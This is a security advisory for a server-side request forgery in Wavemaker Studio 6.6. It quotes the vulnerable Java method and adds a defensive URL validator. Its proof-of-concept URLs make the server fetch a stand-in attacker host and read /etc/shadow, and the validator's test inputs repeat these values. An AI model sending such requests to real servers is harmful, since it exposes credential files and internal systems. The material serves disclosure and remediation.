Wavemaker Studio 6.6 - Server-Side Request Forgery

# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
# Exploit Author: Gionathan "John" Reale
# Google Dork: N/A
# Date: 2018-08-01
# Vendor Homepage: http://www.wavemaker.com/
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
# Affected Version: 6.6
# Tested on: Parrot OS
# CVE : 2019-8982
 
# Description
# Wavemaker Studio 6.6 contains an exploitable unvalidated parameter allowing an 
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
# as a form of HTTP proxy among other things.
 
# Proof Of Concept
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow

# Vulnerable Code
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java

# Line 419-430
@ExposeToClient
public String getContent(String inUrl) throws IOException {
    try {
        // inUrl is the request parameter, passed to the fetch with no scheme or host check
        String str = getRemoteContent(inUrl);
        // inUrl is also written into the returned HTML without escaping
        str = str.replace("<head>", "<head><base href='" + inUrl
            + "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
        return str;
    } catch (Exception e) {
        return "";
    }
}
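
A server-side check that could run before getRemoteContent(inUrl) is called, as an added example that is not part of the original advisory or the WaveMaker code base. InUrlValidator, ALLOWED_HOSTS, htmlAttr and the host list are assumptions made for illustration:

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

// Added example, not WaveMaker code. InUrlValidator, ALLOWED_HOSTS and the
// host list are assumptions made for illustration. Requires Java 9+ (Set.of).
public final class InUrlValidator {
    // Constructed allow-list of hosts the Studio start page may be loaded from.
    private static final Set<String> ALLOWED_HOSTS = Set.of("www.wavemaker.com");

    /** Returns the parsed URI if inUrl may be fetched, otherwise throws. */
    public static URI validate(String inUrl) throws URISyntaxException {
        URI uri = new URI(inUrl).normalize();
        String scheme = uri.getScheme();
        // Denies file:, jar:, ftp: and scheme-less input such as "file///etc/shadow".
        if (scheme == null
                || !(scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https"))) {
            throw new IllegalArgumentException("scheme not allowed");
        }
        // getHost() is null for authorities Java cannot parse as a server; deny those too.
        String host = uri.getHost();
        if (host == null || uri.getUserInfo() != null
                || !ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) {
            throw new IllegalArgumentException("host not allowed");
        }
        return uri;
    }

    /** Escapes a value before it is placed inside the single-quoted base href attribute. */
    public static String htmlAttr(String s) {
        return s.replace("&", "&amp;").replace("'", "&#39;").replace("\"", "&quot;")
                .replace("<", "&lt;").replace(">", "&gt;");
    }

    public static void main(String[] args) {
        String[] samples = { // constructed inputs
            "http://www.wavemaker.com/", "file:///etc/shadow", "file///etc/shadow",
            "http://127.0.0.1:8080/", "http://www.wavemaker.com@attackersite.com/" };
        for (String s : samples) {
            try {
                System.out.println("ALLOW " + htmlAttr(validate(s).toASCIIString()));
            } catch (IllegalArgumentException | URISyntaxException e) {
                System.out.println("DENY  " + s + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

Whatever performs the fetch should also refuse redirects to hosts outside the list, since an allowed host can otherwise forward the request elsewhere.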
            
